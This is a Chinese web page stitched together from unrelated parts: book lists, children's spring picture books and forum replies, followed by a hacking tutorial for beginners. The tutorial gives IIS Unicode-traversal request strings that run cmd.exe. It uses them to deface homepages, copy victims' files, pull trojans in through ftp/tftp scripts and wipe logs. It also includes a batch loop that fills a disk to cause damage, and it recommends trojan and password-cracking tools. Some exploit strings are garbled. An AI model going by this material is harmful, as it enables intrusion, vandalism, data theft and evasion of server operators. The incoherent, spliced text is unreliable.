一，学C语言，C语言的重要性我多说了

　　教材推荐：唐浩的《C程序设计》版。

　　二,假定你现在已经系统的学习过了。现在你就可以分下你要学什么样的技术了，脚本与网站测试，社会工程学，程序破解。

　　针对你的每种学习，我相应的推荐书给你

　　1.脚本攻击类____《黑客大曝光:Web应用安全机密与解决方案》

　　话说，老外写的就是详细，分类得当，当然如果你买的话我推荐你买第三版的，因为最新.

　　2.程序破解类的，没有更好，只推荐你看锻钢的《加密与解密》现在是第三版吧，看完后你能运用50%，基本上你可以自己搞到很多东西。

　　3.社会工程学类的，你就看，世界之一黑客凯文·米特尼克出狱后完成的书《诈骗的艺术》，语言的运用相当精彩。

　　4.编程类的，这个就太多了，还是那句话，C语言学好。

　　三，以上纯属个人意见，具体怎么学，看你怎么做了。贵在坚持，其它的一切都是狗屎。

　　本文将分享一些有趣的书，这些书来自不同编程领域，比如web开发、移动APP开发等。有些书适合菜鸟，也有些适合资深老司机阅读，挑选你感兴趣的书看看吧！

　　React学习之路

　　

　　对于想要学习React的同学，推荐大家阅读《React学习之路》（ the road to learn react2 ）这本书。该书介绍了React的基础知识，基本概念和一些更佳实践，并带你构建一个带有分页、搜索以及排序的应用。每一个章节都有一些练习题和扩展阅读资料。

　　Node.js简述

　　

　　《Node.js简述》（ Node.js Succintly ）是介绍Node.js的书籍中佼佼者。在这本书中，你可以学到一些Node.js的基础知识，例如非阻塞I/O， 事件循环，模块化和Node.js的运行环境等，掌握如何使用文件系统、流、链接数据库以及书写web应用。

　　每个程序员都应该知道的97件事情

　　

　　《每个程序员都应该知道的97件事情》（ 97 things every programmer should know ）对于编程初学者来说这本书都可以算上一个优质的入门书籍。本书提供了丰富的编程实践及理念，提供了大量的实例，并且书的排版格式阅读起来十分简洁方便。

　　移动开发者银河漫游指南

　　

　　《移动开发者银河漫游指南》（ Mobile Developer's Guide to The Galaxy ）这本书主要讲的是创建移动应用的过程，带领各位开发者了解不同的开发阶段如筹备和规范制定、原型设计、实现、内测、发布等等。书中还讲了很多关于UX设计、跨平台及原生开发的小贴士和建议，试着找找看吧！

　　想成为黑客，不知道这些命令可不行

　　

　　《想成为黑客，不知道这些命令可不行》（ Learn Enough Command Line to Be Dangerous ）这本书是一本极少如何使用Unix命令行的书籍，针对于初级开发者，内容通俗易懂，无需任何特殊的计算机知识和技巧也能看懂。跟随教程以及练习就可以学会命令行的初级知识。

　　戏说设计模式

　　

　　《戏说设计模式》（ Game Programming Patterns ） *** 了移动开发者所使用的设计模式，针对初级开发者编写，讲解了一些移动开发的更佳实践以及设计模式，让你的代码更加简洁易懂。

　　想成为黑客，不知道这些git知识可不行

　　

　　《想成为黑客，不知道这些git知识可不行》（ Learn Enough Git to Be Dangerous ）这本书介绍了使用Git进行代码版本管理的相关知识，对于任何阶段的开发者都很适用，无论你是否有使用git的经验，阅读本书都没什么问题。本书是系列书籍，同系列的书还有《想成为黑客，不知道这些命令可不行》（ Learn Enough Command Line to Be Dangerous ）和《想成为黑客，不知道这些编辑器知识可不行》（Learn Enough Text Editorto Be Dangerous ）

　　掌握 iOS 游戏开发

　　

　　《掌握 iOS 游戏开发》（ Mastering iOS game Development ）是一本针对有经验的iOS 游戏开发者设计的书籍，他涵盖了超过200页的深度教程和适用于任何iOS平台的游戏开发概念。跟随这本书，也许你的项目能上升个新高度呢！

　　小小GO书

　　

　　《小小GO书》（The Little Go Book)是一本介绍google GO语言的书籍。本书针对初学者设计，用简练通俗的形式介绍了这门语言的基础知识并配有易于理解的实例，丰富的信息量，仅仅使用了83页的篇幅，功力可见一斑。

　　动人的 JavaScript

　　

　　《动人的 JavaScript 第二版》 （ Eloquent Javascript ）这是这本书的第二版，讲述了很多JavaScript的基础知识。无论是初学者还是资深码农，本书都十分适合，书中不仅有语言基础，而且涵盖了例如面向对象编程的有深度的话题。

　　春天，又称春季，是一年中的之一个季节，时间范围指立春至立夏期间，所包含节气有立春、雨水、惊蛰、春分、清明、谷雨。是万物复苏的季节。在中国每年的3-5月是春天来到的日子，此时万物生机萌发，气候多变，乍暖还寒。

　　

　　在这个万物复苏，生机萌发的春天。树枝渐渐绿了，春花儿渐渐开了，冰雪慢慢消融，天气暖了，心也暖了......春天是个美丽的季节，看惯了冬天的银装素裹，感受过了凛冽的寒风，忽然有春风拂面，又有青草绿树，出门踏青是极好的。在感受自然的同时，一起来和孩子读读关于春天的绘本，在文字和图画中感受不一样的、更丰富多彩的春天。

　　01

　　最美最美的大自然

　　

　　作者：松冈达英

　　适合年龄：5-10岁

　　这一套书包括三本《夜幕降临之后》《春天来到了山野》《草地 嗵》，属于科学绘本图画书，在科学的美中欣赏和寻找大自然的足迹。

　　《草地 嗵》嗵！是脚踏入草地时的声音。伴随着用力踏下的每一步，许多生物慌慌张张地从草地里逃出来，一场奇妙的相逢，让孩子们兴奋得大喊大叫。《春天来到了山野》展现了山野中春天的气息。山茶花、各种植物，昆虫和鸟类都渐渐忙碌起来，大自然重新变得生机勃勃，春天就这样悄悄地来到了山野。《夜幕降临之后》对比了白天和夜晚动物的不同习性，不同时间段出没的动物展现了大自然的生生不息，充满了让人赞叹的生命力。

　　02

　　快递来了

　　

　　作者：间濑直方

　　适合年龄：1-6岁

　　这一次出发的是快递车，在寒冷的冬天边远小镇的小朋友们在温暖的家中盼望着快递的到来。蝴蝶快递给小朋友们一个个都送去了包裹，赶快打开看看里面有什么。原来是春天！春天就这样在小朋友的期盼中，充满了村庄的各个角落。

　　03

　　14只老鼠去春游

　　

　　作者：岩村和朗

　　适合年龄：3-6岁

　　春天来了，当然要去郊游和踏青。十四只老鼠也不例外。它们去了草原，感受了大自然的气息和温暖阳光，玩得非常开心。

　　春天来的时候，小朋友们也可以和爸爸妈妈一起去郊游，呼吸呼吸新鲜空气，发掘一下大自然的奇妙，看看种子看看嫩芽，和爸爸妈妈一起感受美好的春光。

　　04

　　遇见春天

　　

　　作者：原京子 著；秦好史郎 绘；蒲蒲兰 译

　　适合年龄：3-6岁

　　如果你问小朋友们“春天是什么？”一定会有很多不同的答案。双胞胎小熊玛库和玛塔一次从冬眠中醒来，期盼春天的到来。“春天到底是什么？”听了熊爸爸熊妈妈的话也不明白，于是它们自己出去寻找春天。

　　什么是春天，不如自己亲身去体验了一下。书中的最后一页看到满眼春色时，感受到春天的温暖的那种感觉也许就是春天更好的定义。

　　05

　　花婆婆

　　

　　作者：芭芭拉·库尼 ；方素珍 译

　　适合年龄：3-6岁

　　《花婆婆》讲述了一个老婆婆的故事。当鲁菲丝 *** 还是一个名叫艾丽丝的小女孩的时候，她曾经答应过爷爷三件事：之一件事是去很远的地方旅行，第二件事是住在海边，第三件事是做一件让世界变得更美丽的事。前两件事不难，难的是第三件事。直到有一年的春天，她喜出望外地发现山坡上开满了一大片蓝色、紫色和粉红色的鲁冰花时，她知道什么是她要做的第三件事了。整个夏天，她的口袋里都装满了花种子，她把它们撒在了乡间的小路边、教堂后面……原来春天就是让世界变美的魔力。

　　06

　　The thing about spring

　　

　　作者：Daniel Kirk

　　适合年龄：3-6岁

　　一只在冬天还没有玩够的小兔子，不想让春天这么快到来。但是小熊、小鸟、小老鼠都很高兴看到积雪融化，春意盎然。于是，小伙伴们就给了很多喜欢春天和春天可以做的事情的理由，小兔子最后也爱上春天啦~

　　07

　　Spring is here

　　

　　作者：五味太郎

　　适合年龄：3-6岁

　　一本很神奇的故事书，书中两条故事线，一条是关于春夏秋冬四季的交替，草长莺飞、花开花落；一条是关于小牛的成长。稚气十足的小牛出现在春意盎然的桃红色中，为我们带来了气象万千的四季景色，和那深深的生命感动。这本书不动声色地把小牛的成长与四季的变化融合在一起，小牛是春天的小牛，春天是小牛的春天。

　　08

　　Fletcher and the spingtime blossoms

　　

　　作者： Julia Rawlinson

　　适合年龄：3-6岁

　　小狐狸Fletcher发现雪融化了，春天来了。于是他就告诉所有的冬眠的和迁徙的动物春天还没来呢。所有的动物都好失望，但是他们自己发现雪不见了，只有春天的白色花瓣在风中飞舞。你见或者不见，春天就在那里。

　　09

　　When spring comes

　　

　　作者：Kevin Henkes&Laura Dronzek

　　适合年龄：3-6岁

　　春天还没来的时候，草是褐色的。但如果你等待，春天会把它变成绿色，再镶上小小的花朵。如果你等待，一枚蛋会变成一只小鸟，一颗种子会慢慢发芽。从融雪到嫩芽，从春雨到泥巴，从枯草丛生到花园遍染……春天来得忽快忽慢，它总是变化心意。但当它终于留步，你会看到……你喜欢泥巴吗？你喜欢水洼吗？一起翻开这本书，一起嗅闻、感受、体会春天的气息吧！

　　10

　　Spring is here

　　

　　作者：Will Hillenbrand

　　适合年龄：3-6岁

　　小鼹鼠想要叫醒冬眠的小熊，告诉他春天来了，但是怎么也叫不醒它。所以他就想了一个办法，给他做一顿好吃的。小熊真的醒了，但是小鼹鼠却睡着了……为了迎接春天的到来，看来要做不少工作呢，春天这么美好，可不要随便错过哦~

　　这个梦想太伟大了。《黑客X档案》挺不错的。

　　黑客的书的太多了！

　　还有，黑客是实践和觉悟才学会的，不是看书

　　黑客档案，十元。

　　我梦想作黑客……一篇黑客教程（推荐）

　　之一节，伸展运动。这节 *** 们要准备道具，俗话说：“工欲善其事，必先利其器”（是这样吗？哎！文化低……）说得有道理，我们要学习黑客技术，一点必要的工具必不可少。

　　1，一台属于自己的可以上网的电脑。这样你可以有充分的支配权，上网不用说，否则你怎么看到我的文章？wap呵呵！属于自己很重要，否则安全性是个很大的问题。之一点相信大家没有问题。

　　2，windows2000/nt,别和我说98/me,他们是你们同学用来玩游戏的！（当然，我也是铁杆game fan)对 *** 支持极差，命令受限制，很多软件又不能用，对黑客来说使用起来绊手绊脚，非常不利。这里我推荐2000，这是一个很成熟的系统（漏洞还是有一堆）。推荐双系统，这样黑玩搭配，干活不累。

　　3，冰河。中国之一木马，中者数不胜数，国人骄傲。虽然用冰河根本不能算黑客，但它确实能培养你对黑客的兴趣，同时帮助你了解 *** ，相信很多黑客同学都是这样起步的。静止写的那篇冰河教程很不错，大家仔细看看。而且，以后你学会入侵服务器后，用冰河操作也会减少工作量（我是懒虫，爽！）

　　4，oicq。我们学黑客，可不是学泡mm!bfctx你………… 息怒息怒！我们当然是学黑客，但不要忘了，众人拾柴火更高，我们通过cshu的成员列表，互相联系帮助，对提高水平很有帮助！另外我要废话一句：据我了解，现在黑客网站下载最多的都是针对oicq的破解工具，我个人认为很无聊，偷个密码代表什么，浪费时间！最后补充：mm不能不泡。（谁砸我？）

　　5，superscan。很好用的端口扫描器，速度超快，功能一流，一旦拥有，别无所求……（打住！）不论是找木马受害者，还是扫服务器端口，它都非常有效，cshu强烈推荐！

　　6，一本笔记本/便条，网上资料相当多，黑客处理的也是非常之多。良好的习惯决定了你的效率，准备一本笔记本，记录下你的成果，肉鸡，木马利用，命令，密码……坚持一下，你会发现你的效率大幅上升的！

　　7，lc3.著名nt/2000sam破解程序，有时我们拿不到足够权限，又没好办法，那么lc3是更好的解决办法，只要你拿的到sam，你就是服务器它爷爷！本站有其破解程序，支持了暴力破解！

　　8，程序合并。这是玩木马必需的，虽然木马是很低的手段，但有时配合巧办法（以后我会介绍）确实能够达到意想不到的效果，朋友们可以在空闲时玩玩木马，很有趣，若你能巧妙的骗过mm,那么webmaster也可能被你骗倒：〉 （比较理想化）

　　9，流光4for 2000/nt。可能是世界上更好的综合类黑软！中国的骄傲，它集成了很全的漏洞信息，速度快， *** 多，对有漏洞的主机是毁灭性的打击，操作又方便，是快速黑站必不可少的精品工具。超级吐血推荐！

　　10，良好的心态，稳定的情绪，刻苦钻研的精神，刨根问底的作风，打扫房间的习惯。黑客是门很高深的学问，不要幻想一步登天，失败是常有的事，千万不可灰心。在那么多黑软的包围下，切不可完全依赖他们，一定要了解它们利用什么原理工作。对任何一个小问题，小细节，一定要问清楚，cshu就是给大家互相交流的场所哦！黑完后不要得意忘形，打扫战场也很重要，以防万一。

　　之一节操完，可能很无聊，我就这点水平，大家见谅！这里我说一句大话：做完菜鸟操，包你会黑简单的站（哎哟！心慌了！）

　　下一节 *** 们要介绍如何掌握一台主机的基本信息，期待中……

　　－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－

　　真是太对不起大家了，隔了那么久才写这篇教程，我这几天实在太忙，大家还是体谅一下我吧，好了，开始做操。

　　今天的内容是获得主机的信息。 我们要黑一台主机，首先要了解它的信息，包括它的类型，用户列表，目录，端口，漏洞等等。

　　首先我们我们要找一台主机来练手，随便挑吧！

　　(乱说的)

　　之一部，呵呵，先在ie里看看吧，mmmm.....做的还行，挺精致的！主要是我们肯定了它现在是正常的。然后，我们应该知道它的ip,很简单，ping它一下就可以了。

　　ping 看看窗口里有了什么？是不是有三行回应，其中的111.111.222.222就是ip了（还是胡说的，一个例子）。有人是不是要问，我这里怎么没有。那可能是两个原因，之一，你打错命令了；第二，该主机装了防火墙，禁止ping,不过这种可能很小。

　　知道了ip，下一步应该确定端口了。下面是一些常用的端口的默认值

　　21--ftp 重要哦

　　23--telnet 欢呼吧

　　25- *** tp 尽管重要，但似乎没什么可利用的

　　53--domain 同上

　　79--finger 可知道用户信息了

　　80--http 要看网页，没它不行吧

　　110--pop 收信的

　　139--netbios 共享用的，很有利用价值哦

　　3389--win2000超级终端呵呵，这个好！

　　其实端口有上千种，这些最最常用

　　我们怎么知道服务器有什么端口打开呢？去找个扫描器吧，x-scan ,super scan,flux等等很多哦。这里我推荐super scan ，速度很快，本站也有其教程哦！用法还是比较傻瓜的，估计大家不会有问题，轻轻几点，打开的端口就出现了。不错不错，上面说到的都有（太理想化了吧!）

　　那么我们该如何应对呢？

　　ps:忘了说一声，顺便扫一下7626,冰河有也说不准哦：）

　　若有ftp,那就用用匿名登陆。自己动手也行，更好用x-scan flux等吧！反正，有ftp就有一份希望

　　telnet在！好!telnet 111.111.222.222，出现窗口了吧！嗯？要密码？看来网管还不是超级 *** ：）随便猜个，错了，闪人！

　　 *** tp,看着它，无奈

　　domain，一般它带了局域网了

　　finger 可以知道用户列表了，不好，忘了用法了，幸好finger很少出现

　　80肯定在，我们等会来对付它

　　110 有 *** tp，pop在也不奇怪了

　　139 找个扫描器来找找有没有露在外面的共享吧，日后也用得着

　　3389 太太太好了！打开客户端吧，用输入法漏洞试试，成了就干了它！不成也没事，我们以后完全控制它3389会很方便的。

　　端口扫完了！我们在多了解它一点吧！追捕大家都知道吧，其实用它获取主机信息也不赖哦。打开追捕，输入ip,选择智能追捕，是不是有很多信息出来了？虽然不能直接利用，但毕竟我们有对它有了进一步的了解。

　　掌握了那么多信息，我们该做点什么了，一般黑客入侵都是靠着系统漏洞，不会都傻傻地去暴力破解的。我们现在就要看看它有什么漏洞。

　　对漏洞大家可能不太了解，我这里也不能一一说明了，太多了，感兴趣的话去论坛找freedom吧！

　　目前广泛利用和存在的漏洞有：unicode,unicode后续，iis溢出，.idq,.frontpage extend,输入法漏洞等等大漏洞。至于如何确定，呵呵，绝对不会是一行一行地在ie中试吧，拿出x-scan吧，很好的扫描器哦！

　　稍微设置一下就上路吧！过了一会，呵呵，报告出来了，快看，哇！漏洞一大堆！这下赚了！各条漏洞都有详细的信息，大家看吧，总比我说的准了。

　　现在这台主机已经和我们成为亲戚了，要让这位亲爱的亲戚做点事，就要开始各种攻击了，下回我们就探讨一下最最可爱的unicode漏洞，各位可能就会在unicode中完成之一次黑客体验，再见：）

　　－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－

　　今天我们谈谈unicode漏洞，这可是基础中的基础，重点里的重点，不懂的一定要好好学。

　　2000年10月17日中联绿盟发布了以下的安全公告：

　　微软IIS 4.0 / 5.0 扩展UNICODE目录遍历漏洞

　　远程漏洞：是

　　本地漏洞：是

　　发布日期：2000年10月17日

　　更新日期：2000年10月17日

　　受影响的版本： Microsoft IIS 5.0 + Microsoft Windows NT 2000 Microsoft IIS 4.0 + Microsoft Windows NT 4.0 + Microsoft BackOffice 4.5 - Microsoft Windows NT 4.0 + Microsoft BackOffice 4.0 - Microsoft Windows NT 4.0

　　这可是中国乃至全球 *** 安全界的一次大变节，入侵nt/2000系统变得如此简单，不打补丁的死路一条。

　　下面开始正式学习：

　　一，UNICODE漏洞的原理

　　此漏洞从中文IIS4.0+SP6开始，还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1， 台湾繁体中文也同样存在这样的漏洞。

　　中文版的WIN2000中，UNICODE编码存在BUG，在UNICODE 编码中

　　%c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c=0x5c='/'

　　%c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f=0x2f='\'

　　在NT4中/编码为%c1%9c

　　在英文版里： WIN2000英文版%c0%af

　　在中文win2k里：%c1%1c

　　此外还有多种编码，不一一阐述。

　　本文例子均以win2k为准，其他类型请自行替换。

　　二，一切从基础开始

　　由于winnt\system32\cmd.exe的存在，使远程执行命令变为可能，在浏览器里输入以下请求：(假设11.11.22.22有漏洞）

　　11.11.22.22/scripts/..%c1%1

　　学过dos的应该可以看懂，其实就是利用当中的非法请求使我们可以连到system32下，如果inetpub\目录不合winnt同盘，或者目录级数有改动，可能会引起请求失败。

　　如果成功，那么在浏览区可看到如下信息：

　　Directory of C:\inetpub\scripts

　　2000-09-28 15:49 〈DIR〉 .

　　2000-09-28 15:49 〈DIR〉 .. （假设目录中没有文件，实际上有一大堆）

　　是不是有自己机器的感觉了，正点！就是这种感觉！

　　cmd.exe相当与dos里的command.com，因此，我们可以执行很多命令了！

　　 （这个命令同样道理）

　　大家请注意：/c后面的+，实际上，他就是空格，请记牢！dir开始就是dos命令了，我们可以更改一下：

　　11.11.22.22/scripts/..%c1%1

　　会dos的朋友一定懂其意义了，不懂的请去看书 .

　　不用说，大家也知道我们就可以利用它来对有漏洞的机器展开攻击了！

　　三，实战演练

　　1，修改主页！（是不是很爽？）

　　一般主页位置在c:\inetpub\wwwroot下，但要是改了路径，就需要找找了。

　　最方便的 *** ：在浏览器里输入 要是有漏洞，那在浏览器里便会显示主页路径，这个漏洞存在率很高，自然是我们的首选。

　　分析法：用dir看各个盘符的根目录，看可疑的就进去看，运气好的在一分钟里找到，这要看运气和直觉。

　　dir/s法：首先在看其主页，找个图片或连接，看它的文件名，比如，11.11.22.22首页上有一幅图片，右击，属性，看到了吗？iloveu.gif，然后我们利用unicode输入这条命令dir c:\iloveu.gif /s意味着查找c盘下所有目录里的iloveu.gif，注意实际应用时别忘了把空格改为+,如果没有继续找d盘，很快就能确定主页目录的。

　　找到了目录，就要对它开刀了！一般默认收页为index.htm,index.html,index.asp,default.htm,defautl.html,default.asp中的一个，现在我们确定11.11.22.22中为index.htm

　　那么我们就修改它吧！

　　最方便的 *** ：echo法。echo是一个系统命令，主要用于设置回应开关，而echo cshu >c:\autoexe.bat就是把cshu加入autoexec.bat里并删除原有内容，echo cshunice >>c:\autoexec.bat就是加入cshunice但不删除原有内容，这样我们就可以逍遥的改了。

　　11.11.22.22/scripts/..%c1%1>c:\inetpub\wwwroot\index.htm

　　回应为：HTTP 500 - 内部服务器错误

　　通过对cmd的分析，袁哥得出一条简便的 *** ，加入"符号

　　11.11.22.22/scripts/..%c1%1".exe/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

　　11.11.22.22/scripts/..%c1%1".exe/c+echo+2001730+>>c:\inetpub\wwwroot\index.htm

　　回应为：cgi错误，不用理会

　　两条命令一下，呵呵，再看看11.11.22.22，是不是烙上我们的大名了？不错吧

　　而在实际操作中，可能袁哥的 *** 也会失效，这时，我们就可以copy cmd.exe 为另一个exe，记住路径，用copy后的来echo

　　例如：11.11.22.22/scripts/..%c1%1

　　11.11.22.22/scripts/..%c1%1>c:\inetpub\wwwroot\index.htm

　　2,上传法：echo有点不讲道理，把人家的文件破坏了，要是想在主页上增光添彩，那就应该用改好的主页上传，这个我们后面介绍。

　　几点忠告：

　　1，对于没有主页的机器（就是正在建立的主页），不要改它，这很没水准，也很没道德

　　2，echo前记得帮他们做好备份

　　3，不准在主页里加入恶性语句

　　2，下载文件

　　要是有什么有用的文件被你发现，那我们如何下载呢？

　　最简单的 *** ：把文件copy至网页目录下。copy c:\email\baby.eml c:\inetpub\wwwroot\baby.zip,然后，下载11.11.22.22/baby.zip就行了，注意！实际应用中要记得对文件名进行修改，总之不能暴露。

　　别的 *** ：对不起，没想好：）

　　3，最重要的上传

　　一般 *** ：ftp法

　　首先建一个ftp脚本文件：c:\hehe.haha（名字乱取把），申请一个ftp账号，然后用echo吧

　　echo+open ftp.cshu.com（ftp主机） > c:\hehe.haha

　　echo+user yourname >> cc:\hehe.haha (yourname是用户名)

　　echo+yourpasswd >> c:\hehe.haha (yourpasswd是密码)

　　echo+get setup.exe >> c:\hehe.haha 要下载的文件

　　echo+quit >> c:\hehe.haha

　　完了以后：ftp+/s:c:\hehe.haha,由于是ftp主机，那么速度一定很快，过一会setup.exe就会出现在当前目录了（也就是cmd所在目录）

　　别忘了先上传到ftp主机，不要做马大哈哦！

　　最简单的 *** ：tftp法。

　　这种 *** 不用中转服务器，首先准备一个tftp服务端，它的作用就是把你的机器做成一个tftp服务器，利用漏洞机器来下载（注意，运行tftp时不要运行其他的ftp软件）

　　在这里我推荐cisco tftp server，自己去找找把，实在没有来找我：）

　　安装好后运行，别忘了设置好默认目录，否则会找不到文件

　　tftp命令：tftp -i 1.2.3.4 GET ihateu.exe c:\winnt\ihateu.exe（ihateu.exe在默认目录里）

　　1.2.3.4为你的ip，用unicode运行一下，会看到tftp server里有反应了，这就好了，不一会，文件就传上去了，方便把！

　　学会了上传，我们就可以好好改主页，还可以上传木马，还可以把程序放上去运行…………（运行程序和在dos里一样）

　　4，如何清除痕迹

　　虽然国内主机纪录ip的不是很多，但万事小心为妙，unicode权限达不到admin。用cleaniislog行不通，就…………直接删吧！

　　C:\winnt\system32\logfiles\*.*

　　C:\winnt\ssytem32\config\*.evt

　　C:\winnt\system32\dtclog\*.*

　　C:\winnt\system32\*.log

　　C:\winnt\system32\*.txt

　　C:\winnt\*.txt

　　C:\winnt\*.log

　　全……擦掉！

　　四，细节问题。

　　1，遇到长文件名怎么办？

　　c:\program files\

　　就用c:"program20%files"\

　　2，遇到空格怎么办？

　　20%代替喽，或者xx yy=xxyy~1

　　3,如何做个很大的文件？

　　目的就是破坏啦！我不喜欢不过教教你们啦

　　@echo off

　　echo big > c:\a.a

　　:h

　　copy c:\a.a+c:\a.a c:\a.a

　　goto h

　　注意不要乱来啊！

　　4，输入命令，没反应或反应不对。

　　：）请检查检查再检查命令的正确性，可能没有漏洞，那就闪人！看在你看到这里那么给我面子的份上，在给你几个吧！

　　 :\ 或 或 或

　　不一定有用哦！

　　5，如何找到unicode漏洞的主机

　　呵呵：）更好的 *** 自然是………………一个一个ping,一个一个试喽：）

　　不要打我呀！我说我说。更好找一个cgi扫描器，unicode查找器多如牛毛，随便找个吧！

　　6，我copy，del文件，怎么显示aceess denined

　　这个不好办了，由于unicode所拥有的权限有限，出现上述情况很正常，我们要做的便是提高自己的权限！

　　这个我会在今后介绍，现在你可以试试attrib

　　attrib -r -h -s c:\autoexec.bat

　　再对autoexec.bat进行操作，看看有没有效果，成功率不高，不好意思！

　　7，我黑了主页，天下无敌？

　　我本来想对你说：“见你的鬼去吧！”不过想想不大礼貌，有失我绅士风度，所以改个口

　　echo主页或改主页在不懂黑客的人看起来很了不起，不过，它最多算是一个基础，拿到admin才是我们的终极目标！

　　对cshu全体成员来说，不准去改正在建立的网页！这是我们的原则！

　　要是你想耍耍威风，那也可以理解，那就去黑外国的，或者url欺骗也是个好选择

　　8，我如何做更多的事？

　　之一，努力提高权限

　　第二，由于cmd的限制，我们可以做的不多，那就要程序帮忙，上传吧！切记，要隐秘！

　　先看关于编程方面的书吧…

　　推荐一本：《c程序设计》 第三版和第四版的都可以。

　　楼主您好,我到是觉得学习不用盯一种书学哦

　　我推荐你去一个9年资历的老牌技术站学习吧,那里有大量适合新手学习的教程与文章

　　找一下:黑靶安全网

　　它们与网易都合作开发技术教程,实力肯定是相当强大